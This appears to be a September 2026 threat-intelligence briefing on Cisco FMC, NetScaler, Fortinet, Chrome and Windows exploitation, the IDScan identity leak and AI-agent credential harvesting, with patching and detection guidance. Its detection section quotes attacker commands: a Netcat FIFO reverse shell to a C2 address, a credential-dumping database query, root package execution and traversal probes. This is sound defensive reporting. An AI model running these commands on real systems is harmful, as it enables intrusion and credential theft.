Last Updated On

They Turned Your Firewall Manager Into the Breach Path
The firewall manager stopped being furniture and became the breach path. Cisco Talos showed CVE-2026-20079 turning Secure FMC into unauthenticated root, then into credential theft, Cyclops Blink, and Qilin consistent ransomware staging, while CISA put that bug on a 2026-09-12 clock beside Citrix CVE-2026-19490 and Fortinet CVE-2025-25249.
The same window dumped a record Microsoft cycle that closes two exploited Windows zero days, Chrome CVE-2026-87491 as the seventh Chrome zero day of 2026, and a BlueMoon kit that four China aligned sets shared in 12 days. Nexus listed 153 million plus driver licenses with IR and UV scans that can walk straight through lazy KYC.
Google TAG then watched a human foothold hand the rest of the intrusion to agents that harvested thousands of working credentials in under six hours. Patch the managers, hunt license.tmp before you trust the hotfix, freeze identity exposure, and detect burst plus entropy logins before the next playbook runs without a human in the loop.
10
CVSS Score
8
IOC Count
24
Source Count
86
Confidence Score
CVE-2026-20079, CVE-2026-20316, CVE-2026-19490, CVE-2026-19489, CVE-2025-25249, CVE-2026-87491, CVE-2026-85880, CVE-2026-81963, CVE-2026-59822, CVE-2026-49869, CVE-2026-82329, CVE-2026-78509, CVE-2026-20131
UAT-11823, UAT-12197, UAT-11988, TA412, JungleBamboo, Violet Typhoon, APT31, additional China nexus BlueMoon operators, financially motivated AI agent operator, IDScan Nexus marketplace actor, Fortinet PivotC2 operator
Government, Critical Infrastructure, Technology, Identity Verification, Aerospace and Defense, Financial Services, Healthcare, NGOs, Enterprise Network Operations
North America, United States, Canada, Global appliance estates, China nexus targeting of United States NGOs and aerospace
Chapter 01 - Executive Overview
The window from 15:00 IST on 2026-09-09 through 21:14 IST on 2026-09-10 compressed control plane exploitation, a population scale identity leak, a record Microsoft patch cycle, shared exploit kit reuse, and autonomous credential harvesting into a single defender work queue.
[+] Highest impact appliance finding: CVE-2026-20079 is a CVSS 10.0 Cisco Secure FMC authentication bypass that yields unauthenticated root. Cisco Talos documented three post compromise clusters that steal management credentials, install Cyclops Blink, and stage Qilin consistent ransomware from the firewall manager itself. CVE-2026-20316 static credentials are part of those chains. There is no workaround for on premises FMC.
[+] Same day KEV edge set: CISA also listed CVE-2026-19490 Citrix NetScaler AAA and Gateway bypass and CVE-2025-25249 Fortinet cw_acd heap overflow, both due 2026-09-12. NetScaler has no workaround. Fortinet offers a CAPWAP fabric restriction only as a temporary control.
[+] Zero day patch cycle: Microsoft shipped 966 to 974 CVEs, the largest cycle on record in consulted recaps, including exploited CVE-2026-85880 ALPC sandbox escape and CVE-2026-81963 Update Stack elevation. Chrome CVE-2026-87491 is actively exploited and is the seventh Chrome zero day of 2026.
[+] Shared kit: Four China aligned espionage sets adopted the BlueMoon Chrome plus Windows chain inside 12 days, with TA412 first on 2026-08-28. Both legs of that chain are now patched.
[+] Identity blast radius: 153 million plus United States and Canadian driver licenses, plus millions of ID cards and travel documents, appeared on the Nexus dark web service. High resolution IR and UV scans are sufficient for automated KYC bypass. Sampled records have been verified. The company has not forensically confirmed exact volume.
[+] Agentic shift: Google TAG watched a financially motivated actor hand a compromised cloud host to a multi agent system that scanned, rotated IPs, corrected errors, and harvested thousands of valid credentials in under six hours. Initial access was human. Post exploitation was autonomous.
[+] Immediate mandate: Patch FMC, NetScaler, Fortinet, Chrome, and the Windows zero days on the published clocks. Hunt license.tmp and Tomcat JSP drops before declaring an FMC clean. Rotate credentials for any identity verification exposure. Deploy burst plus entropy detections for agentic harvest patterns. Treat an internet reachable firewall manager as a control plane incident, not a routine patch ticket.
Chapter 02 - Threat & Exposure Analysis
Active exploitation is concentrated on management planes and gateways that sit above endpoint telemetry. A rooted firewall manager is being used as an identity broker, a configuration oracle, and a ransomware staging desk.
[+] Cisco Secure FMC control plane: CVE-2026-20079 lets an unauthenticated remote actor send crafted HTTP to the FMC web interface, bypass authorization, and run scripts as root through Tomcat Runtime.getRuntime().exec(). Scope is Changed on the Cisco 10.0 vector, so impact is scored beyond the component. CVE-2026-20316 adds a static low privileged login that Talos observed inside chained privilege elevation and malicious package execution. Cloud Security Cloud Control was patched by Cisco. On premises FMC has no workaround.
[+] UAT-12197 tradecraft: Exploits CVE-2026-20079, writes a JSP web shell in the CSM Tomcat webroot, drops cmd.jar, and runs /bin/sh -c queries against the FMC mdb database. The observed query pulls name and auth_data from the users table via OmniQuery. That harvest exposes AD bind accounts, VPN secrets, and other stored management credentials.
[+] UAT-11823 tradecraft: Assessed by Talos as an APT cluster with high confidence. Actors modify license.tmp as a Makeself package and execute it through /usr/local/sf/bin/package_info.pl ... --lsm as root, open Netcat reverse shells, steal managed device configurations, stage archives, and install a Cyclops Blink variant with /etc/init.d/ persistence, DoH, file admin, command execution, scanning, and packet sniffing. Tooling overlap with Sandworm is reported. Direct identity as Sandworm remains under attribution.
[+] UAT-11988 tradecraft: Assessed by Talos as a ransomware operator with high confidence. Actors log in with static credentials, abuse legitimate FMC utilities to map hostnames, IPs, AD service accounts, MySQL accounts, computer objects, and high value infrastructure, then stand up a Python SOCKS5 proxy and reverse SSH. Forwards include LDAP 389, LDAPS 636, Kerberos 88, SMB 445, RPC 135, and WinRM 5985. Follow on tooling includes Impacket, Invoke TheHash, custom AV killers, and Qilin consistent encryption on selected endpoints. Named affiliate identity remains under attribution.
[+] Citrix NetScaler AAA and Gateway: CVE-2026-19490 is an alternate path authentication bypass on AAA virtual servers and Gateway modes including SSL VPN, ICA Proxy, CVPN, and RDP Proxy. SAML action configurations expand the usable surface. No workaround exists. Consulted sensors show probing after the 2026-08-19 bulletin, exploitation from 2026-09-03, and a one day spike on 2026-09-08.
[+] Fortinet FortiOS path: CVE-2025-25249 is a heap overflow in cw_acd across FortiOS, FortiSwitchManager, and FortiSASE. Consulted recaps describe unauthenticated RCE via crafted requests, CAPWAP UDP 5246 to 5249 as an attack path, and PivotC2 as a Node.js RAT follow on. One recap set cites more than 30,000 targeted IPs, 178 infected hosts concentrated in the United States, and two reported data theft cases. Those victim counts are not independently mapped in primary vendor text.
[+] Microsoft and Chrome zero days: CVE-2026-85880 is an ALPC heap overflow that takes AppContainer code execution to SYSTEM with no extra user click. CVE-2026-81963 is a Windows Update Stack link resolution path to SYSTEM. Both were exploited before the September release. CVE-2026-87491 is a Chrome V8 out of bounds write, actively exploited, fixed in Chrome 153.0.8010.36 and later. Outlook CVE-2026-78509 is a preview triggered RCE patched in the same cycle and not shown as exploited.
[+] BlueMoon kit reuse: Proofpoint tracking, as restated in consulted desks, shows four China aligned espionage sets adopting the same Chrome V8 plus Windows ALPC chain inside 12 days. TA412 was first on 2026-08-28. Delivery is a phishing link to an exploit server, then renderer RCE, then kernel shellcode. All three legs used in that chain are now patched.
[+] IDScan document exposure: 153 million plus United States and Canadian driver licenses, 10 million plus ID cards, 3 million travel documents, and 579 thousand health insurance cards, about 170 million documents in total, listed on Nexus. Records include front and back images, IR and UV layers, barcode and OCR JSON, name, license number, date of birth, address, photo, and signature. That package is enough for automated KYC bypass. Four class actions have been filed.
[+] Agentic credential harvest: Google TAG observed a financially motivated actor complete human initial access into cloud infrastructure, then launch a coding chatbot plus prompt plus markdown playbook system. The agents scanned, rotated IPs, repaired failed payloads, validated logins, and moved thousands of working credentials in under six hours. Adjacent same window identity pressure includes the FBI 2026-09-01 OAuth consent phishing alert and Microsoft reporting on passkey themed vishing and adversary in the middle activity since May 2026.
[+] Additional critical disclosures in window: Check Point published two CVSS 9.8 RCEs on Security Gateway, Management, and Spark Firewall where Remote Access VPN or Site to Site VPN is enabled. LiteLLM CVE-2026-59822 remains a KEV item with a failed Bearer check falling through to an empty UserAPIKeyAuth() session. Kestra CVE-2026-49869 and JFrog Artifactory CVE-2026-82329 were disclosed on 2026-09-09 as unauthenticated command injection and admin bypass.
Chapter 03 - Operational Response
Immediate, 0 to 24 hours.
[+] Inventory: Identify every Cisco Secure FMC and Security Cloud Control firewall management instance, including internet facing, partner reachable, VPN reachable, and internal only appliances. Record version, patch state, interface exposure, and admin account inventory.
[+] Patch FMC now: Apply Cisco hotfixes for CVE-2026-20079 and CVE-2026-20316 immediately. Do not wait for the later hardening bundle. Cloud SCC is already patched by Cisco. On premises FMC has no workaround.
[+] Patch peer edge now: Upgrade Citrix NetScaler ADC and Gateway to 14.1-73.32+, 13.1-63.21+, or the matching FIPS builds. Patch Fortinet FortiOS to 7.6.4+, 7.4.9+, 7.2.12+, or 7.0.18+, FortiSwitchManager to 7.2.7+ or 7.0.6+, and migrate FortiOS 6.4 off the branch. Apply Check Point 2026-09-09 hotfixes.
[+] Patch clients now: Chrome to 153.0.8010.36+ with enforced relaunch. Windows via KB5124008, KB5122880, and KB5122878 with priority on CVE-2026-85880 and CVE-2026-81963. LiteLLM to 1.84.0 or later, then rotate every MCP credential and hunt default key sk-1234.
[+] Quarantine exposure: Pull FMC and NetScaler management interfaces off the public internet. Place them behind IP restricted bastions or out of band management networks. Temporary Fortinet control is to remove fabric allowaccess or restrict CAPWAP CONTROL UDP 5246 to 5249 with a local in policy.
[+] Treat exposure as possible compromise: Hotfixes block future exploitation and do not clean a box that already ran package_info.pl /var/tmp/license.tmp --lsm. Preserve FMC audit events, web logs, Tomcat logs, task history, package activity, process lists, authentication records, and filesystem metadata before rebuild.
[+] Hunt first artifacts: home.jsp, cmd.jar, suspicious license.tmp, unexpected package_info.pl, Netcat, new /etc/init.d/ scripts, Cyclops Blink hashes, published C2 IPs, and FMC originated sessions to LDAP, Kerberos, SMB, RPC, or WinRM.
[+] Session and identity actions: Flush NetScaler AAA and VPN sessions and force reauthentication after the upgrade. Rotate FMC admin accounts, AD service accounts, MySQL secrets, API tokens, SSH keys, and every firewall credential stored on that manager. For IDScan exposure, push MFA resets, credit freezes, and monitoring at user scale.
Short term, 1 to 7 days.
[+] Perimeter blocks: Deny known FMC web shell paths under /tomcat/webapps/ROOT/*.jsp, cmd.jar drops, Cyclops Blink module names, Qilin tunnel signatures, and the published Talos IPs after internal confirmation.
[+] NetScaler audit: Review internet facing Gateway and AAA virtual servers for SAML action configurations that widen CVE-2026-19490. Follow Citrix compromise check steps where exploitation is suspected.
[+] BlueMoon detection: Hunt Chrome V8 crash signatures chained to ALPC exploitation sequences and enforce the Chrome 153 floor.
[+] AI and MCP review: Inventory LiteLLM and other MCP endpoints. Alert on burst credential use, IP entropy, low error rate, and sub two second retry loops.
[+] OAuth review: Monitor illegitimate consent grants per the FBI 2026-09-01 alert.
Strategic, 30 days.
[+] Behavioral baseline: SOC playbook for autonomous agent patterns including rapid enumeration, proxy rotation, and self correcting exploit loops.
[+] Identity vendor contracts: Require immediate deletion of high resolution IR and UV scans after verification. Stop archival of raw document images.
[+] Patch gap monitoring: Track Chromium upstream fixes versus stable lag so the next kit cannot ride a two week window.
[+] Purple team: Simulate the FMC chain from authentication bypass through license package execution to Cyclops Blink and Qilin staging, plus a BlueMoon phishing to SYSTEM path, without firing production exploits.
[+] Third party risk: Add dark web monitoring for identity processors and treat an internet reachable firewall manager as a board level control plane risk.
[+] 2026-03-04: Cisco discloses CVE-2026-20079. No exploitation claimed.
[+] 2026-07-13: Fortinet publishes FG-IR-25-084 for CVE-2025-25249.
[+] July 2026: Consulted recaps place Fortinet exploitation and PivotC2 start here.
[+] 2026-07-23: Example FMC compromise log shows www sudo to package_info.pl /var/tmp/license.tmp --lsm.
[+] 2026-07-29: CVE-2026-20316 disclosed as exploited and added to KEV.
[+] August 2026: Cisco PSIRT becomes aware of CVE-2026-20079 exploitation.
[+] 2026-08-19: Citrix patches and discloses CVE-2026-19490.
[+] 2026-08-28: BlueMoon first use by TA412. NetScaler probing appears in consulted telemetry.
[+] 2026-08-31: Nexus lists IDScan document stores on a Russian language forum.
[+] 2026-09-01: Krebs publishes. FBI New Orleans opens an investigation.
[+] 2026-09-02: CISA adds LiteLLM CVE-2026-59822. NetScaler PoC activity circulates.
[+] 2026-09-03: NetScaler exploitation reported in the wild.
[+] 2026-09-04: IDScan posts a no index notice using possible access language.
[+] 2026-09-08: Microsoft September Patch Tuesday ships 966 to 974 CVEs. Consulted NetScaler sensors record 36 exploit attempts in one day.
[+] 2026-09-09: CISA adds CVE-2026-20079, CVE-2026-19490, CVE-2025-25249, and Chrome CVE-2026-87491. Talos publishes three FMC clusters. Check Point ships hotfixes. Google TAG publishes the agentic harvest report.
[+] 2026-09-10: IDScan confirmation and BlueMoon analysis move through consulted desks. Federal due date for the new edge KEV rows is 2026-09-12.
[+] Week of 2026-09-14 to 2026-09-16: Talos points to a broader FMC hardening release. Exact day conflicts inside that text. Apply current hotfixes first.
Chapter 04 - Detection Intelligence
Cisco FMC exploitation paths.
[+] CVE-2026-20079 mechanic: CWE-288 improper authentication in a boot time system process on the FMC web interface. An unauthenticated actor sends crafted HTTP to /api/fmc_platform/v1/ and related internal stems. The flawed handler takes an alternate authorization branch and permits script parameters that execute as root.
[+] CVE-2026-20316 mechanic: CWE-259 static or hard coded low privileged credentials. Score is 5.3. Operational value is the foothold it gives for package_info.pl execution as root and for cluster activity that never needs the CVSS 10.0 bypass.
[+] UAT-12197 chain: JSP web shell in CSM Tomcat webroot Base64 decodes parameter F6C1F0E7 as a Java class name, loads cmd.jar, and runs /var/jre/bin/java -jar cmd.jar '/var/sf/bin/OmniQuery.pl -db mdb -e \'SELECT name, auth_data FROM users;\''. Exfiltration is HTTP POST to actor infrastructure.
[+] UAT-11823 chain: Malicious license.tmp written as a Makeself package, executed by /usr/local/sf/bin/package_info.pl /var/tmp/license.tmp --lsm, then rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208.123.119[.]215 3090 >/tmp/f, then Cyclops Blink with init persistence.
[+] UAT-11988 chain: Static credential login, built in FMC recon, staging inside files the manager can already read, HTTP GET exfil, Python SOCKS5 plus reverse SSH, then Impacket, Invoke TheHash, AV killers, and Qilin on the enumerated endpoint list.
BlueMoon and Windows ALPC.
[+] Kit order: Phishing link, Chrome V8 patch gap or CVE-2026-87491 class out of bounds write, renderer RCE, CVE-2026-85880 ALPC heap overflow in alpc!AlpcpProcessMessagePort, AppContainer escape, SYSTEM implant.
[+] ALPC detail: Controllable size field in PORT_MESSAGE enables an out of bounds write into the kernel pool. A crafted ALPC_MESSAGE_ATTRIBUTES corrupts an adjacent object and elevates the token. Affected families include Windows 10 1607 through 22H2, Windows 11 23H2 24H2 25H2, and Server 2012 through 2022.
LiteLLM MCP.
[+] CVE-2026-59822 mechanic: In litellm/proxy/auth.py, verify_litellm_proxy_key() catches InvalidTokenError on Bearer validation then falls through to an OAuth2 passthrough that returns UserAPIKeyAuth() with empty fields. Downstream code treats that object as an authenticated session, so MCP tools run with full permission. The fix is fail closed. Default key sk-1234 magnifies the miss.
IDScan record structure.
[+] Each record can carry up to six image files: front, back, IR, UV, barcode, and OCR JSON. Fields include full name, driver license number, date of birth, address, photo, signature, PDF417 barcode data, and document class. That is a ready made bypass kit for platforms that trust static document scans.
AI agent architecture.
[+] Observed pieces: coding chatbot for payload generation, a harvest objective prompt, markdown playbooks for recon, scan, exploit, collect, and rotate, and a LangGraph or Autogen style orchestrator. Capabilities include nuclei and nmap class scanning, retry with mutated payloads, proxy pool IP rotation, login validation, and exfil to cloud storage.
Fortinet and NetScaler mechanics.
[+] CVE-2025-25249: CWE-122 in cw_acd. Fortinet describes unauthenticated RCE via crafted requests. ASLR and PIE raise complexity and match the vendor AC:H 8.1 vector even though NVD lists 9.8.
[+] CVE-2026-19490: CWE-288 alternate path around the SAML authentication action handler. Consulted hunt stems include /vpn/index.html and traversal style probes such as /vpn/../vpns/cfg/smb.conf.
Defanged. Validate against internal telemetry before enforcement. Talos values are point in time pivots, not permanent block objects.
[+] UAT-12197 file: SHA-256 b037f45e02a289325a1a5eb0d4db6a9fce9954fd0fdfd07162cb4eb2acbef77d for home.jsp web shell.
[+] UAT-12197 file: SHA-256 db491181ece3f319de6567ab6f6daa90c6879911cd890155e6b7d8cc7a1a8c8e for cmd.jar.
[+] UAT-11823 file: SHA-256 6f98add5d1a7729192b6ad8491d85c505c64836f7881742d6b93bd8e3d2fe461 for Cyclops Blink ELF.
[+] UAT-11823 network: 89.34.96[.]56 Netcat and Cyclops Blink C2.
[+] UAT-11823 network: 208.123.119[.]215 Netcat reverse shell C2 on port 3090 in the published command line.
[+] UAT-11823 network: 104.218.165[.]253 scanner source for CVE-2026-20079.
[+] UAT-11823 network: 91.214.78[.]118 Netcat reverse shell C2.
[+] UAT-11988 network: 43.204.2[.]142 intrusion source IP.
[+] Host artifacts: /var/tmp/license.tmp, /usr/local/sf/bin/package_info.pl ... --lsm, CSM Tomcat home.jsp and cmd.jar, socks5.py, sudo log USER=root COMMAND=/usr/local/sf/bin/package_info.pl /var/tmp/license.tmp --lsm, /etc/init.d/ persistence scripts.
[+] Web shell marker: JSP parameter F6C1F0E7 Base64 decoded as a Java class name.
[+] Additional consulted probe nodes, lower confidence: 194.26.29[.]114, 45.154.255[.]87, 185.220.101[.]42, 91.240.118[.]172.
[+] URI stems: /api/fmc_config/v1/internal/bootexec, /api/fmc_platform/v1/, /vpn/index.html, /vpn/../vpns/cfg/smb.conf.
[+] BlueMoon delivery: chromepatch[.]dev, winupdate[.]services. ALPC artifact PORT_MESSAGE with u1.s1.DataLength = 0xFFFF.
[+] LiteLLM: default key sk-1234, paths /mcp, /v1/mcp, /api/mcp.
[+] IDScan marketplace: nexus[.]onion, reported offline after listing. Sampled records include an investigator Virginia license and a Secretary of Defense license.
[+] Version floors: Chrome below 153.0.8010.36. Windows before KB5124008, KB5122880, KB5122878.
[+] Snort SID ranges to confirm locally: 66075 to 66080 for CVE-2026-20079, 66883 for CVE-2026-20316, 66960 to 66961 for the malware set.
Hunt the management host first, then the identity path, then the agentic burst pattern. Confirm local Snort coverage for SIDs 66075 to 66080, 66883, and 66960 to 66961 before treating those signatures as a control.
SIGMA: FMC license package execution
SIGMA: FMC Tomcat webroot write
SIGMA: Netcat FIFO reverse shell
SIGMA: Windows ALPC follow on from Chrome
SIGMA: FMC HTTP exploit probe
YARA: JSP marker and command JAR
SIEM pseudocode: agentic credential harvest
[+] SIEM field logic: Alert when process.command_line contains package_info.pl and license.tmp, especially as root and outside a change ticket.
[+] SIEM field logic: Hunt home.jsp, cmd.jar, and new JSP or JAR files under Tomcat or CSM paths and compare hashes to the Talos set.
[+] SIEM field logic: Alert on FMC originated outbound sessions to 89.34.96[.]56, 208.123.119[.]215, 104.218.165[.]253, 91.214.78[.]118, 43.204.2[.]142, or to internal ports 88, 135, 389, 445, 636, 5985, 3090.
[+] SIEM field logic: FortiGate hunt on allowed UDP 5246 to 5249 joined to an unexpected node process on the appliance.
[+] SIEM field logic: NetScaler AAA allow with a null SAML header and a client IP outside known corporate VPN ranges.
[+] Triage rule: A license.tmp hit is an incident until Cisco TAC says otherwise. Patching after that line is not clearance.
Source publications do not always print ATT&CK IDs. IDs below mix source aligned behavior with inferred mapping from the same tradecraft.
[+] T1190 Exploit Public Facing Application: Initial Access. FMC, NetScaler, Fortinet, Check Point. High.
[+] T1078 Valid Accounts: Defense Evasion and Initial Access. Static FMC account and alternate path AAA sessions. High.
[+] T1068 Exploitation for Privilege Escalation: Privilege Escalation. CVE-2026-20079, CVE-2026-85880, CVE-2026-81963. High.
[+] T1505.003 Web Shell: Persistence. FMC JSP in Tomcat webroot. High.
[+] T1059.004 Unix Shell: Execution. cmd.jar to /bin/sh -c, Netcat FIFO, package installer. High.
[+] T1059.007 Java / interpreted commands: Execution. cmd.jar and OmniQuery. High.
[+] T1003 / T1552 Credential Dumping and Unsecured Credentials: Credential Access. FMC users.auth_data, AD, MySQL. High.
[+] T1572 / T1090 Tunneling and Proxy: Command and Control and Lateral Movement. SOCKS5 and reverse SSH. High.
[+] T1486 Data Encrypted for Impact: Impact. Qilin consistent staging. High.
[+] T1189 Drive by Compromise: Initial Access. BlueMoon phishing links. Medium.
[+] T1211 Exploitation for Defense Evasion: Defense Evasion. Chrome V8 sandbox escape. Medium.
[+] T1210 Exploitation of Remote Services: Lateral Movement. Cyclops Blink from FMC. High.
[+] T1543.002 Systemd / init persistence: Persistence. /etc/init.d/ Cyclops Blink. High.
[+] T1562.001 Impair Defenses: Defense Evasion. AV killers before encryption. High.
[+] T1583.006 Web Services: Resource Development. LiteLLM MCP abuse. High.
[+] T1586.002 / T1588.002 Account and tool acquisition: Credential Access and Resource Development. AI agent harvest. Medium.
[+] T1656 Impersonation: Initial Access. OAuth consent phishing. Medium.
[+] D3FEND themes inferred for control design: inbound traffic filtering, process execution limitation, system call analysis, MFA, file integrity monitoring, network isolation, network traffic analysis, user account management, host behavior comparison, patching.
Chapter 05 - Governance, Risk & Compliance
[+] Federal clock: FCEB agencies must remediate the 2026-09-09 KEV adds under BOD 22-01 and the restated BOD 26-04 clock. Due 2026-09-12 for CVE-2026-20079, CVE-2026-19490, and CVE-2025-25249. Due 2026-09-16 for LiteLLM CVE-2026-59822. Due 2026-09-22 for CVE-2026-85880 and CVE-2026-81963. Due 2026-09-23 for Chrome CVE-2026-87491.
[+] European and UK duty: NIS2 and UK CAF operators should treat actively exploited perimeter managers as 72 hour class events after KEV listing.
[+] Privacy duty: GDPR and CCPA notification analysis is triggered for IDScan as processor and for downstream KYC controllers that consumed those scans. Exact legal determination sits with counsel. Four class actions are already filed.
[+] Markets duty: Public companies that used IDScan or that lost a firewall control plane may need an 8-K materiality review under SEC cyber rules. EU NIS2 Article 23 can also fire on confirmed management plane compromise.
[+] Accountable owner: Name one technical owner for FMC inventory, hotfix proof, exposure reduction, and evidence preservation. An unpatched exception needs a business owner, exposure path, compensating control, and a dated close date.
[+] Evidence standard: "No alert observed" is not proof that a root capable manager was clean. Require an incident decision for every exposed unpatched FMC.
[+] Policy updates: KEV critical and high internet facing SLA of 48 hours, internal five days. Identity verification contracts must require immediate deletion of IR and UV scans. Third party registers must include dark web monitoring for document processors.
[+] Executive framing: An FMC compromise is an identity, lateral movement, and ransomware preparation event. It is not a network admin ticket.
Chapter 06 - Adversary Emulation
Do not replay CVE-2026-20079, CVE-2026-20316, CVE-2026-19490, or Fortinet CAPWAP exploits against production. Validate telemetry in an authorized lab.
[+] Sandworm style FMC chain: After a lab foothold, write a benign license.tmp, invoke a non privileged stub in place of package_info.pl, drop a harmless file named home.jsp with the F6C1F0E7 string in a test webroot, open a FIFO reverse shell to an internal listener, and attempt LDAP SMB WinRM port forward patterns. Success is syslog and SIGMA fire, EDR catch of mkfifo|/bin/sh -i|nc, and firewall logs of manager sourced 389 445 5985.
[+] BlueMoon phishing to SYSTEM: Detonate a lab lure that stops before real V8 or ALPC exploits. Validate email sandbox, Chrome version enforcement, the ALPC SIGMA, and EDR kernel callbacks.
[+] AI agent harvest: From a compromised lab cloud host, generate high rate login attempts across many SaaS targets with IP rotation and low error rate. Success is the burst plus entropy SIEM logic, API rate limits, and canary credential alerts.
[+] LiteLLM MCP takeover: Prove that default key sk-1234 and a failed Bearer path cannot mint a tool session. Success is deny closed auth, tool call logging, and default key scanning.
[+] IDScan weaponization: Test liveness, document tamper checks, and velocity rules against high resolution scanned licenses. Do not use stolen production images.
[+] Tabletop inject 1: Dark web monitoring finds 50 executive licenses from the IDScan set. Test notification, credit freeze coordination, and spear phish readiness.
[+] Tabletop inject 2: KEV adds CVE-2026-20079 at 08:00 and the internet facing FMC count is 47. Test emergency patch, rollback, and compensating WAF or ACL rules.
[+] Tabletop inject 3: SOC sees 10,000 login attempts from 200 IPs in 10 minutes against one service account. Test the agentic playbook, auto block thresholds, and forensic capture.
[+] Exposure probe allowed only from an approved scanner against your own estate:
[+] Expected defensive result: TCP RST or HTTP 403 before the application stack. A 200 from an untrusted network is an exposure finding.
Factor | Effect on 86/100 | Note |
|---|---|---|
CISA KEV plus Cisco Talos plus PSIRT on FMC | Strong up | Active exploitation and three clusters are primary vendor documented |
CISA KEV on NetScaler, Fortinet, Chrome, Windows, LiteLLM | Strong up | Federal listing is treated as exploitation evidence |
Talos IOCs, command lines, and Snort SIDs | Strong up | Enough for hunt packages without waiting on third party enrichment |
Sandworm and Qilin names | Down | Tooling overlap and TTP consistency sit in one primary paper. Identity stays under attribution |
BlueMoon four actor roster | Down | Kit reuse is documented. Full actor set rests on a narrower publisher set |
IDScan volume | Down | Sampled records verified. Company language remains possible access, not a forensic headcount |
AI agent operator | Down | Google TAG observed the operation and did not name the group |
Fortinet PivotC2 victim counts | Down | Recap figures are not independently mapped in primary vendor text |
CVE-2025-25249 score split | Down | Vendor 8.1 versus NVD 9.8 versus recap 7.3 to 7.4 is logged, not smoothed |
Talos hardening week 14 versus 16 | Logged only | Does not change the hotfix now mandate |
No independent VT or passive DNS pass | Down | IPs stay investigation pivots until local telemetry agrees |
Victim sectors and regions for FMC clusters | Down | Not published in consulted sources |
